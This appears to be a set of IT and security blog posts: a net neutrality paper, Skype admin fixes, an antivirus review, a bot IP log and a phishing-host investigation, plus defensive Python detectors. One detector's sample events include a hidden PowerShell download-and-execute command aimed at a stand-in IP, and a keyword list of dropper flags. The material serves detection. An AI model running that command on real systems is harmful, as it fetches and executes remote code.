The Net Neutrality rules came under attack in January 2017, when president Donald Trump appointed Ajit Pai, an FCC commissioner who had previously voted against Title II reclassification of the internet, as the new head of the FCC. Net Neutrality was finally repealed on June 11th of 2018 and is no longer in effect after nearly 20 years of having classified internet services under the protection of telecommunication laws.

As of June 20th, 2018 thirty-six states have proposed or passed a resolution, bill, or executive order to preserve Net Neutrality since the new rules were adopted. Six states, Hawaii, Montana, New Jersey, New York, Rhode Island, and Vermont, have addressed this change by issuing Executive Orders requiring companies wishing to contract with the State to confirm that they will meet the 2017 net neutrality requirements. Thirty states have proposed legislation reinstating the net neutrality rules or requiring state contractors to abide by them. Ten additional states initiated Resolutions supporting Net Neutrality principles (NRRI, 2018)

Today there is a clause under which internet service providers (ISPs) have to disclose the circumstances in which they block or slow traffic, and to disclose if and when they offer paid-priority services. The FCC preserved these ‘transparency’ rules, which address the concern many had about the power ISPs could hold over these communications. This mitigates the risk that a provider would block or throttle connections, as Comcast did with BitTorrent, without telling its customers. The current ruling is a win for consumers, who are only seeking a basic set of guidelines or principles to regulate the behavior of providers. It doesn’t have to be called Net Neutrality, but it does have to provide increased transparency while still allowing ISPs to grow and innovate in the markets in which they operate. We can’t let it be used in an anti-competitive, fraudulent, or discriminatory way to harm consumers and diminish the right of equal internet access for all who seek it.

California net neutrality bill easily passes Assembly

Internet groups urge U.S. court to reinstate ‘net neutrality’ rules

Net Neutrality Repeal Enables Abuse By Carriers, Groups Tell Court

Ajit Pai killed net neutrality but still wants you to love the FCC

(Note: I’m actively updating this small paper I wrote for a class on Net Neutrality for a novice audience)

References:

Bello, P., & Jung, J. (2015). Net Neutrality: Reflections on the Current Debate. GLOBAL COMMISSION ON INTERNET GOVERNANCE

CIGI. (2015). Net Neutrality: Reflections on the Current Debate https://www.cigionline.org/sites/default/files/no13_web.pdf

Comcast Corporation. (2008, September). Comcast Corporation Description of Current Network Management Practices. Retrieved from http://downloads.comcast.net/docs/Attachment_A_Current_Practices.pdf

FCC. (2018, May 22). FCC Releases Restoring Internet Freedom Order. Retrieved from https://www.fcc.gov/document/fcc-releases-restoring-internet-freedom-order

FCC. (2017). Myth Vs. Fact. Retrieved from https://transition.fcc.gov/Daily_Releases/Daily_Business/2017/db1128/DOC-347961A1.pdf

Frieden, R. (2018). Freedom to Discriminate: Assessing the Lawfulness and Utility of Biased Broadband Networks. Vanderbilt Journal of Entertainment & Technology Law, 20(3), 655-708.

NRRI. (2018). Net Neutrality State Actions Tracker. Retrieved from http://nrri.org/net-neutrality-tracker/

Skype – Why can’t it all be so simple


Skype now has four versions of its software – purely for your confusion and inconvenience. Most recently, Microsoft was on its way to canceling Skype v7.0, with a deadline of Sept 1st, until an uproar from internet users not-so-quietly rolled that back. The new version of Skype that Microsoft is pushing now is v8.0. Users have raised issues about its design and overall feel; one ‘idea’ on the Skype UserVoice feedback site reads “Make Skype 8 look EXACTLY like Skype 7 Classic.” In its own forum, Microsoft stated that “Based on customer feedback, we are extending support for Skype 7 (Skype Classic) for some time. Our customers can continue to use Skype Classic until then.”

The Skype Release Notes are not being updated frequently by Microsoft. We’re seeing new versions, and 1 to 2 weeks later there are still no details on what’s changed.

Skype FAQ and Known Issues has limited information on actual issues we’ve seen with the software. It would be nice to have a closed loop, with the Release Notes showing when things are fixed.

Here’s a quick rundown on versions of Skype:

Skype for Business – Used by SMBs and enterprises, typically via Office 365, but it can also be hosted privately (Rackspace, etc.).

Skype for Windows 10 v11 – Windows 10 app installed from the Microsoft Store. This version is built on the Universal Windows Platform (UWP), which means the same app runs across Windows 10 form factors like PC, tablet, phone, and holographic devices. At this time it’s not clear whether it is missing any features compared to the new Skype Desktop, but it does seem to be a very basic, touch-oriented app.

Skype Classic v7.0 – An apparent all-time favorite of Windows users, and they don’t want it to go away. It’s the “same old” Skype and seems to be working perfectly. I’ve run into errors installing it on Windows 10 at times, which were probably due to a major Windows update for which MS still hadn’t shipped the fixes to make it work.

Skype for Desktop v8.0 – Newest version of Skype that brings Free HD Video, @mentions, group calls with 24 users, and will soon have privacy features like off-the-record audio chats. The biggest value-add here is in those features, which are combined with a modern interface and, of course, the promise of future development.

There’s also: Skype for Web, Skype Meetings, Skype for Mac, Skype For Linux, Skype for Android, and Skype for iOS, if you feel like you don’t have enough Skype in your life.

Issues:

I’ll make a list of known issues and fixes as I test the software. Please see below for some of the common deployment and usage-type problems I’ve found in Skype, especially on the new v8.0.

  • Skype v8.0 – attempts to launch SkypeSetup.exe out of the user profile when the user has no admin permissions. The user can NOT open Skype – even when they click No, the program keeps trying to trigger this downloaded file. This happens every time Skype releases an update, and it effectively locks the user out until admin credentials are provided.

Adding these lines to the hosts file seemed to help block this version of Skype from trying to auto-upgrade:

127.0.0.1 get.skype.com
127.0.0.1 livegeteastus.cloudapp.net
127.0.0.1 liveget.trafficmanager.net

Delete or block the SkypeSetup file (cmd, run in the affected user’s session):

del "%APPDATA%\Microsoft\Skype For Desktop\SkypeSetup.exe" /f

  • Skype v8.0 – does not remove Skype Classic from a machine when you push it out. In my testing, I was able to remove Skype v7 first and then push Skype v8. It migrated my profile to the new version. If I pushed Skype v8 on top of v7, it would launch both on start-up. Simply removing v7 didn’t fix it – I had to push v8 again after the removal. Here’s my recommendation (cmd, run as administrator):

REM "product" here is the Win32_Product WMI class: enumerating it makes Windows Installer
REM re-validate every MSI package on the box (slow, and it logs MsiInstaller event 1035),
REM so run this as a one-off rather than from a login script
wmic /node:'LOCALHOST' /interactive:off product where "name LIKE 'Skype% 7.%'" call uninstall

REM push the v8 installer only after the v7 removal has completed
Skype-8.27.0.85.exe /silent

  • Skype for Business – Installs with the Business version of Office 365 and will NOT let you remove it from the computer. Go ahead, try it… use a customized install XML and it won’t honor the request to keep Lync off the machine. Even if it does remove Lync, the app will automatically reinstall during an online repair of Office.

Remove it from start-up for the current user (the Run value is named Lync):

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Lync /f

  • Skype for Business – A second issue with Skype for Business is connecting to regular Skype users. Microsoft requires them to associate their account with a Live.com e-mail before this can happen. You can’t find them, and they can’t find you, until that has been done. In my testing, I could not add my personal Skype account to a test instance of Skype for Business without the Microsoft e-mail association.

  • Skype v11 for Windows 10 – This version of Skype can cause confusion and compatibility issues when it comes to the new features offered by Skype Desktop v8.

Remove it using PowerShell (this removes it from the current user’s profile):

# Restricted only blocks .ps1 scripts from running; it does not affect cmdlets typed interactively
Set-ExecutionPolicy -Scope LocalMachine Restricted
# Remove the Store (UWP) Skype app from the current user profile
Get-AppxPackage Microsoft.SkypeApp | Remove-AppxPackage

Panda Antivirus Adaptive Defense 360


We recently tested Panda Adaptive Defense 360 as a follow-up to a previous review of NGAV products. Does Panda live up to its claims? Is it the future of antivirus? It has its ups and downs, but overall I think the issues we experienced can be fixed. It’s headed in the right direction, and the interface is well designed for a modern protection platform.

Panda’s current version is 7.x and the product is Adaptive Defense 360. From the marketing on the website, you get the feeling that it’s not your average ‘Panda’ but next-generation, sexy, and ready to eradicate even the most virulent samples.

During the test, I exchanged 178 emails with the vendor over a period of fewer than 90 days. I’ve learned a great deal through direct experience of its stability and effectiveness. It’s been my experience that you’d better test the heck out of these products. Not only with detection but the basic administration features as well. There can be bugs lurking that may not impact you on the security side but potentially impair your ability to control and manage endpoints. I went ahead and dug in using my basic Dell models and hoped for the best. Keep in mind that the things I don’t ‘like’ are bugs that can be resolved – not necessarily fatal issues. Here’s my evaluation…

*** Update 8/13 – Panda is aware of this blog and actively working to fix any of the issues I found. They’ve allocated folks from Product Management, Engineering and other teams to help improve response.

A few things to note:

1. My blog recommends products on occasion but has nothing for sale
2. Bugs like to come out when I’m around so careful if I sign up for a demo
3. I don’t drink the kool-aid so I look forward to lifting the marketing curtain

Machines Tested:

Dell Latitude E6440, E5470, E5480
Dell XPS 8390 (Desktop)
Dell Inspiron (7000 Series)
Windows 7 and Windows 10

Things we liked: 

  • Support is light speed and much more responsive than BitDefender’s. We received prompt responses and consistent service from all of the techs. They responded appropriately to our concerns. Many times it was just a matter of reproducing the issues and gathering the right data. Panda can trigger a ‘PSINFO’ tool to gather support data without you having to send any technical information to support yourself. In comparison, I’ve waited days and days for BitDefender support to reply, and even when they do, it’s not with any urgency. If you call, there is typically no way to speak to anyone live at BitDefender until they call you back. Panda is easy to get on the phone and often called me in the morning, when I was available.
  • Panda recently implemented anti-tampering. I’ve been advocating for this across a number of products. In Barkly, I could simply stop any of the AV processes, execute malcode and start them again. Panda protected its services even in the services.msc snap-in.
  • EDR function traced the source of execution back to a file on many virus samples we tested. We’d get an alert within 0-15 minutes that showed which process executed a particular piece of code and where it connected to. Very useful and is focused on the context of that execution. Liked this better than the fancy tree in other EDR products. It’s better to be able to alert on this in an e-mail format without needing to access the console.
  • Deployment tools were adequate in that there were no major issues with installing, uninstalling or deploying the files. Minimal interruption or notices to the machine when pushing it down with a script. Removal from the console happens in under 15 minutes on most machines.
  • Panda’s support is phenomenal despite the many bugs we hit on the particular platform we had available to test. They responded quickly. During our support cases they offered access to an early-release version of Panda AD360 8.x as a way to get past known issues on v7.

Issues we worked with support on:

  • Crashing/Bluescreens – Panda caused many bug checks on my machines in the driver NNSPRV.SYS, and by many I mean over a dozen across multiple machines. A common factor for some was that they were running a slightly older version of the Intel PROSet wireless drivers, but I cannot fully confirm that was the cause. The crashes continued until we were put on an early release of version 8.0, which seemed to alleviate them; at the time, that was not a general release. Every dump referenced Panda drivers, and the crashes happened often.

  • Performance Issues/Hangups – Machine slowdowns on several boxes, including severe delays opening applications. This happened several more times in the last few months, most recently on my own machine while I was using it. I captured video of it and called in to offer an impacted machine to Panda. They were unavailable to gather any data and did not recommend any steps to take on the machine at that time. I had to remove the product and could not wait until ‘tomorrow’ to find out what I needed to do. That issue is still not identified or resolved. The burden was on me to prove that this is an issue, even though I’ve captured live video of it happening multiple times. Panda was using 10,000 handles in PSANHOST.EXE when the issue occurred. Chrome tabs were completely hung, and simple applications like Notepad.exe took more than a minute to open. The issue was immediately resolved by removing the AV, which, by the way, was so hung up that the removal took about 30 minutes. After the removal we could immediately surf the web and open applications.
  • Service instability – Panda services were crashing randomly on versions 7.x-8.x. We detected this in the monitoring of its services, and the issue impacts the latest version. Support requested that we gather a dump manually with a tool so they could assess the issue. The main service controlling Panda crashes with ‘The Panda Endpoint Administration Agent service terminated unexpectedly’ on these machines. There is no fix or explanation for this issue, and it’s separate from the ones shown above. We don’t know why the service keeps crashing or what to do next. Even if we did, we believe that this ‘broken agent’ issue leads to decreased security for those endpoints when they aren’t able to update or communicate properly. A lot of time is being spent manually reinstalling agents to fix this issue.
  • Upgrade Issues – Panda also failed to upgrade from v7 to v8 automatically on around 25% of the computers, leaving the agent ‘broken’ and not functional. There was, of course, a fix or method for support to help us, but it was manual, involved remoting into each machine, and again the upgrade just didn’t work, without any explanation. Many of the computers have rebooted numerous times and get repeatedly prompted to ‘Upgrade Panda’ even after accepting that prompt over and over. Meanwhile, the agents did not have full protection because the install was technically broken between versions.

(Screenshot: Panda Support)

  • Dropper Detection / Kill Chain Issues – None of the files I opened with malicious Word macros were detected until the actual payload ran. Panda did not detect many files on access, only once they ran, further down the attack chain. It will stop the PowerShell command from running, but only at the point of execution. A little too close for comfort, especially when many other tools see the evil in the macros and malware code embedded in the document. Out of the dozen or so files I got live from the internet, none of the droppers triggered an alert until they tried something fishy. Panda was quick about adding them as a generic type of alert when I sent in samples. There is no automated system or method to submit samples to Panda without manually opening an e-mail ticket. Panda’s ‘EDR’-type execution report fails to correlate the malicious .doc I opened and only ‘sees’ the PowerShell. But what ran the command? What were the parameters?

(Screenshot: Panda Support)

  • False Positives – We found that Panda would trigger on innocuous Windows 10 processes such as those that update Windows Store applications. In some cases it labeled them ‘potentially malicious’ and, in lock mode, halted execution while it determined whether they were truly malicious. This wasn’t the only ‘system’-type file; we encountered many more from Nvidia and a driver from Intel.
  • Web Filtering / Phishing – Many of the malware and phishing URLs I attempted to visit weren’t classified by the software. During my investigation of the ‘Master Angler’ story this month I had Panda running, and it never blocked any of the URLs. I submitted a URL to Panda from my blog and they added that single address, but none of the others obviously running off the same IP. After reporting many of these URLs to Panda I realized that the phishing protection is outsourced to Cyren rather than using Panda’s own threat intelligence.
  • Buggy Alerting – Malware alerts were configured for the web and were sent directly from the IP via SMTP to my e-mail server, which is kind of strange. Not only that, but there were still unresolved variables in the e-mail, like {ExtendedUrlMalwareinfo}. The other issue was that I’d get tons of duplicates with the same information, maybe 5-10 e-mails in a blast from a single machine visiting a site. It says ‘Virus deleted’ but I couldn’t find anything malicious on some of these sites.

  • Console Outages – The web console had issues on several occasions with server-side errors that prevented me from logging in. At this exact moment I keep logging in, but it tells me that for security reasons my session has timed out.

  • Cookie Alarm – Panda sent alerts for cookies detected on machines and I couldn’t turn it off. There was no way to whitelist or otherwise exclude this extra noise.
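To show what the correlation Panda’s report was missing looks like in practice, here is an added example (my own code for this write-up, not anything from Panda’s product) that walks process-creation events back to the Office process that opened the document and pulls out the document path and the PowerShell flags. The events are constructed to resemble Sysmon Event ID 1 records for the attack chain described above; the PIDs, user, document path and download URL are all made up for the example.

```python
import ntpath
import re

# Parents that should never be spawning script hosts, and the hosts we care about
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments typical of macro droppers (lower-cased substring match)
SUSPICIOUS_ARGS = ("-enc", "-w hidden", "-nop", "downloadstring", "iex ", "invoke-expression")
# Office document path quoted on the Office process's command line
DOC_RE = re.compile(r'([A-Za-z]:\\[^"]+?\.(?:docm?|dotm?|xlsm?|xlsb|pptm?|rtf))', re.IGNORECASE)

# Constructed process-creation events (Sysmon Event ID 1-like fields); not from Panda's console.
EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe", "user": r"CORP\jdoe"},
    {"pid": 1200, "ppid": 400, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": "OUTLOOK.EXE", "user": r"CORP\jdoe"},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE /n "C:\Users\jdoe\AppData\Local\Microsoft\Windows\INetCache\3873JDSB987391.doc"',
     "user": r"CORP\jdoe"},
    {"pid": 1400, "ppid": 1300, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -nop -w hidden -c ...", "user": r"CORP\jdoe"},
    {"pid": 1500, "ppid": 1400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.5/x')\"",
     "user": r"CORP\jdoe"},
    # Benign admin script launched from the desktop: same binary, no Office ancestor, must not fire
    {"pid": 1600, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\inventory.ps1", "user": r"CORP\jdoe"},
]


def basename(image):
    """Lower-cased file name from a Windows image path (ntpath works on any OS)."""
    return ntpath.basename(image).lower()


def ancestry(index, pid):
    """Process chain from the oldest known ancestor down to pid; loop-safe if PIDs were reused."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(index[pid])
        pid = index[pid]["ppid"]
    return list(reversed(chain))


def office_spawned_script_hosts(events):
    """One finding per script host with an Office application anywhere in its ancestry,
    carrying the full chain, the document the nearest Office ancestor opened, and the flags used."""
    index = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        chain = ancestry(index, e["pid"])
        office = [a for a in chain if basename(a["image"]) in OFFICE]
        if not office:
            continue
        doc = DOC_RE.search(office[-1]["cmdline"])
        cmd = e["cmdline"].lower()
        findings.append({
            "pid": e["pid"],
            "user": e["user"],
            "chain": " -> ".join(basename(a["image"]) for a in chain),
            "document": doc.group(1) if doc else None,
            "flags": [f for f in SUSPICIOUS_ARGS if f in cmd],
            "cmdline": e["cmdline"],
        })
    return findings


if __name__ == "__main__":
    for f in office_spawned_script_hosts(EVENTS):
        print(f"pid {f['pid']} ({f['user']}): {f['chain']}")
        print(f"  document: {f['document']}")
        print(f"  flags:    {f['flags']}")
```

The chain answers both questions Panda’s report left open (what ran the command, and with which parameters) and names the document, which is what you want in an alert e-mail. The stand-alone PowerShell launched from Explorer is deliberately left alone; the Office ancestor, not the binary, is the signal.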


Bad Bots – Headless Chrome


There’s never a shortage of bad bots and unidentifiable applications that crawl websites. Are they scraping the content? Updating it for some unnamed organization’s news site? Storing an archive of it? It’s not clear, as they typically won’t identify themselves with a legitimate robot-type user agent.

One group of firewall logs recently caught my eye for a few reasons. The first reason was that, similar to my issue with OVH Hosting in a previous blog, there were numerous clients connecting simultaneously with the same user agent. At any given time, 3 to 5 of these hosts would be crawling information, like tags and posts, off of the site. Viewing the visitors live, I saw that a high percentage of the IPs below were all using the same user agent.

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/64.0.3282.119 Safari/537.36

Here’s a copy of the firewall log where I set up a rule to do an extended browser validation using JavaScript:

Does anybody know the purpose and source of these connections? Did you end up here by searching for one of these IPs? Nearly all of the addresses below fall in ranges belonging to Amazon Technologies, so they are most likely instances running on Amazon Web Services.

100+ IP Addresses recorded in the month of July:

18.236.120.18
18.236.243.214
18.237.41.164
18.237.61.143
18.237.123.0
34.208.40.36
34.208.92.220
34.208.141.124
34.208.235.48
34.209.44.200
34.209.114.64
34.209.227.101
34.210.78.254
34.210.100.217
34.210.221.104
34.211.25.220
34.211.190.187
34.211.227.196
34.212.71.188
34.212.116.241
34.212.131.138
34.214.150.53
34.215.152.137
34.216.26.43
34.217.14.63
34.217.50.13
34.217.107.188
34.218.250.187
34.219.11.198
34.219.39.87
34.219.92.251
34.219.141.108
34.219.193.58
34.219.225.182
34.220.16.137
34.220.59.162
34.220.80.254
34.220.103.78
34.220.148.196
34.220.188.241
34.220.199.88
34.220.224.29
34.221.7.4
34.221.22.134
34.221.32.36
34.221.58.141
34.221.77.132
34.221.142.89
34.221.164.175
34.221.241.244
34.221.242.167
35.160.27.133
35.160.98.44
35.161.21.171
35.162.116.37
35.164.15.117
35.164.69.206
35.164.100.206
35.165.242.232
35.166.95.89
35.166.178.125
35.172.212.99
52.10.12.227
52.12.129.255
52.13.68.33
52.13.80.33
52.25.232.118
52.27.65.70
52.34.53.176
52.35.81.218
52.35.124.32
52.36.59.177
52.38.5.86
52.38.39.61
52.40.23.116
52.40.76.8
52.41.164.108
52.89.45.141
54.68.182.6
54.70.12.254
54.70.144.155
54.148.14.116
54.149.73.177
54.184.19.153
54.185.147.189
54.186.70.168
54.187.36.97
54.187.196.207
54.190.184.2
54.191.111.154
54.191.111.220
54.191.197.179
54.200.246.200
54.201.191.42
54.201.229.227
54.202.84.215
54.202.248.143
54.212.211.34
54.213.15.127
54.213.61.104
54.213.242.152
54.218.1.204
54.218.84.30
54.218.112.201
54.244.15.175
54.244.37.100
54.245.26.75
54.245.183.44
91.213.143.248
167.99.167.226
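As an added example (not part of the original post), here is how I would turn the observation above into a repeatable check: parse access-log lines, pull out every HeadlessChrome client, and only block when the same headless build shows up from several cloud-hosted addresses at once, which is the pattern in the list above. The log lines are constructed, and the AWS prefixes are an assumed subset that covers the sample addresses; the authoritative list is https://ip-ranges.amazonaws.com/ip-ranges.json, not fetched here so the script runs offline.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample in combined log format. Not the author's firewall log; the first three
# client IPs are taken from the list above and the user agent is the one observed in the post.
SAMPLE_LOG = """\
34.208.40.36 - - [12/Jul/2018:10:01:03 +0000] "GET /tag/phishing HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/64.0.3282.119 Safari/537.36"
34.208.40.36 - - [12/Jul/2018:10:01:04 +0000] "GET /tag/malware HTTP/1.1" 200 4980 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/64.0.3282.119 Safari/537.36"
52.10.12.227 - - [12/Jul/2018:10:01:05 +0000] "GET /2018/07/ HTTP/1.1" 200 7710 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/64.0.3282.119 Safari/537.36"
203.0.113.7 - - [12/Jul/2018:10:01:09 +0000] "GET /about HTTP/1.1" 200 3300 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
167.99.167.226 - - [12/Jul/2018:10:02:11 +0000] "GET /tag/skype HTTP/1.1" 200 4100 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/64.0.3282.119 Safari/537.36"
198.51.100.20 - - [12/Jul/2018:10:02:30 +0000] "GET /robots.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
"""

# Assumed subset of AWS prefixes (us-west-2) covering the sample addresses above.
AWS_PREFIXES = [ipaddress.ip_network(p) for p in
                ("34.208.0.0/12", "52.10.0.0/15", "54.184.0.0/13", "18.236.0.0/15", "35.160.0.0/13")]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
HEADLESS_RE = re.compile(r'\bHeadlessChrome/(?P<ver>[\d.]+)')


def parse_log(text):
    """Yield one dict per well-formed combined-log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def in_prefixes(ip, prefixes):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in prefixes)


def headless_report(text, prefixes=AWS_PREFIXES):
    """Per client IP that announces HeadlessChrome: hit count, distinct paths, builds seen, cloud-hosted?"""
    per_ip = defaultdict(lambda: {"hits": 0, "paths": set(), "versions": set(), "cloud": False})
    for rec in parse_log(text):
        m = HEADLESS_RE.search(rec["ua"])
        if not m:
            continue
        entry = per_ip[rec["ip"]]
        entry["hits"] += 1
        entry["paths"].add(rec["path"])
        entry["versions"].add(m.group("ver"))
        entry["cloud"] = in_prefixes(rec["ip"], prefixes)
    return dict(per_ip)


def block_list(report, min_cloud_ips=2):
    """IPs to block: every client running a headless build that was seen from at least
    min_cloud_ips distinct cloud-hosted addresses (one UA, many simultaneous hosts, as in the
    post). A lone headless hit is often a monitoring tool or a screenshot service, so it is left alone."""
    by_version = defaultdict(set)
    for ip, e in report.items():
        if e["cloud"]:
            for v in e["versions"]:
                by_version[v].add(ip)
    noisy = {v for v, ips in by_version.items() if len(ips) >= min_cloud_ips}
    return sorted(ip for ip, e in report.items() if e["versions"] & noisy)


if __name__ == "__main__":
    rep = headless_report(SAMPLE_LOG)
    for ip, e in sorted(rep.items()):
        print(f"{ip:16} hits={e['hits']} paths={len(e['paths'])} cloud={e['cloud']} "
              f"build={','.join(e['versions'])}")
    print("block:", block_list(rep))
```

The user-agent match is only the first filter: a scraper can send any UA string it likes, which is why the JavaScript validation rule mentioned above still earns its keep. Clustering by build and hosting provider is what separates a crawler farm from a single probe; note that the DigitalOcean-range address in the sample is still blocked once its build is tied to the AWS cluster.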

Phishing – A Master Anglers Toolbox


We recently came across a researcher’s gold mine of phishing sites. It all started with a PDF file named Post-Label received via e-mail. The file itself is harmless, but it links to the USPS scam shown in the screenshots below.

(Screenshot: USPS-Phishing)

Further analysis of this IP found that it belongs to QuadraNet, a colocation provider whose only role is hosting physical servers for its clients. The server is provided to AlphaRacks, a VPS provider that rents out computing space to its own customers. QuadraNet is no stranger to malware and C&C, ranking #8 on the top 10 worst spam ISPs.

VirusTotal shows a ton of sites being hosted off this box, and an almost unbelievable number of phishing pages and malware samples. We found more than 60 different brands being phished off this one IP address, with activity going back to March 2018. It’s a phenomenon I call ‘hiding in plain sight’: vendors have been detecting the issue for many months, but no one had taken the initiative to file an abuse report.

We filed an abuse report and QuadraNet is now aware of the issue. They’ve committed to cutting off access from this IP if the client does not respond within a set period and clean up the phishing sites. We’ve included numerous updates on the progress of the cleanup below, just before the screenshots we collected over a period of months.

https://www.virustotal.com/#/ip-address/162.220.11.2

https://www.virustotal.com/#/ip-address/167.160.188.2 (Added 10/2018. New IP owned by Alpharacks)

URLScan provides regular screenshots of the activity hosted on various domains at this IP address. I’ve seen hundreds and potentially thousands of domains pointing to this location over the last several months.

https://urlscan.io/ip/162.220.11.2

https://urlscan.io/ip/167.160.188.2

https://www.abuseipdb.com/check/162.220.11.2

https://checkphish.ai reports 1,945 phishing URLs have been observed off of this address.

Brands being phished include CIBC Bank, DHL, GoDaddy, Microsoft Live, Office 365, OneDrive, Outlook Web Access, PayPal, USPS, 50+  others all on a single IP. This is a master angler at work, folks!

We have seen phishing attempts against the companies below. This is not confirmation that they were compromised, only that someone scanned a URL containing one of their e-mail addresses, so we presume the owner received it via an inbound phishing e-mail. Keep in mind this list represents only a small portion of the recipients and just a couple of days’ worth of URLs scanned on VirusTotal:

Australia and New Zealand Bank
Aditya Birla Group
Conrad Hotels
Ericsson
Fox Broadcasting
Huawei
KPMG
Owens Corning
PotashCorp
QBE Insurance Group
Reebok
Regus
Seagate
State of Minnesota
Tetra Pak
Toyota
The Linde Group
VF Corporation
Volvo

NOTE: Some of this research is incomplete and should be investigated further by other researchers. I tend to post these kinds of ‘live’ hacks quickly, to get the word out and let folks experiment a bit before the hackers are shut down. The first thing I did was notify the hosting provider, so the clock is ticking. Or maybe it’s not, depending on how well they handle abuse complaints.
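As an added example (my own script, not the author’s tooling), this shows the two pivots used in this post on a URL feed: count how many distinct brands are impersonated on each hosting IP, and recover the targeted recipients from addresses that the phishing kit embeds in the URL to prefill its login form. The observations are constructed (the two IPs are the ones named above; the hostnames, paths and addresses are invented), and the brand keyword table is an assumption you would replace with your own watchlist.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed (ip, url) observations in the shape of a urlscan/VirusTotal URL feed.
# IPs are from the post; hostnames, paths and recipient addresses are invented.
OBSERVATIONS = [
    ("162.220.11.2", "http://usps-tracking-update.example/track/index.php?id=12"),
    ("162.220.11.2", "http://secure-login.example/office365/?email=jane.doe%40volvo.com"),
    ("162.220.11.2", "http://secure-login.example/onedrive/#ken@kpmg.com"),
    ("162.220.11.2", "http://mail-verify.example/owa/login.php?user=anna.l%40ericsson.com"),
    ("162.220.11.2", "http://paypal-resolve.example/signin/"),
    ("162.220.11.2", "http://dhl-parcel-notify.example/shipment/"),
    ("167.160.188.2", "http://godaddy-renew.example/login?e=staff%40reebok.com"),
    ("192.0.2.10", "http://www.example/blog/post"),
]

# Assumed brand watchlist: hostname/path token -> brand name (tune to the brands you protect)
BRAND_KEYWORDS = {
    "usps": "USPS", "office365": "Office 365", "onedrive": "OneDrive", "owa": "Outlook Web Access",
    "paypal": "PayPal", "dhl": "DHL", "godaddy": "GoDaddy", "cibc": "CIBC Bank",
}
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def brands_in(url):
    """Brands named in the hostname or path, matched on whole tokens so 'dhl-parcel' and '/owa/' count."""
    parts = urlsplit(url.lower())
    tokens = re.split(r"[^a-z0-9]+", parts.netloc + " " + parts.path)
    return {BRAND_KEYWORDS[t] for t in tokens if t in BRAND_KEYWORDS}


def emails_in(url):
    """Recipient addresses the kit carries in the query, fragment or path (after percent-decoding)."""
    parts = urlsplit(unquote(url))
    return set(EMAIL_RE.findall(" ".join((parts.path, parts.query, parts.fragment))))


def profile_hosts(observations, brand_threshold=3):
    """Per hosting IP: hostnames seen, brands impersonated, recipient domains, and whether the
    brand count crosses the threshold that marks a shared phishing box rather than a single kit."""
    per_ip = defaultdict(lambda: {"hosts": set(), "brands": set(), "target_domains": set()})
    for ip, url in observations:
        p = per_ip[ip]
        p["hosts"].add(urlsplit(url).netloc.lower())
        p["brands"] |= brands_in(url)
        p["target_domains"] |= {e.split("@", 1)[1].lower() for e in emails_in(url)}
    return {ip: dict(p, multi_brand=len(p["brands"]) >= brand_threshold) for ip, p in per_ip.items()}


if __name__ == "__main__":
    for ip, p in profile_hosts(OBSERVATIONS).items():
        flag = "SHARED PHISHING HOST" if p["multi_brand"] else "single/none"
        print(f"{ip}: {len(p['hosts'])} hosts, brands={sorted(p['brands'])}, "
              f"targets={sorted(p['target_domains'])} -> {flag}")
```

The recipient domains are exactly the kind of list shown above: evidence that an address at the company received the lure, not that anything was compromised. The multi_brand flag is what makes this IP worth an abuse report on its own, independent of any single domain being taken down.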

E-mail possibly associated with activity: [email protected] 

Dozens of the sites have login pages for the Pony Botnet:


Updates:

11/19 – New IP address observed 167.160.188.2 owned by Alpharacks and has an equivalent amount of scam websites up and running.

10/16 – We will allow the provider Quadranet to continue working with its client to remediate the issue.

9/17 – Activity continues and no response from ‘[email protected]‘ or Quadranet.

8/21 – Quadranet has reportedly taken action against AlphaRacks by null-routing its IP again due to the abuse. The IP was responding again a short time later.

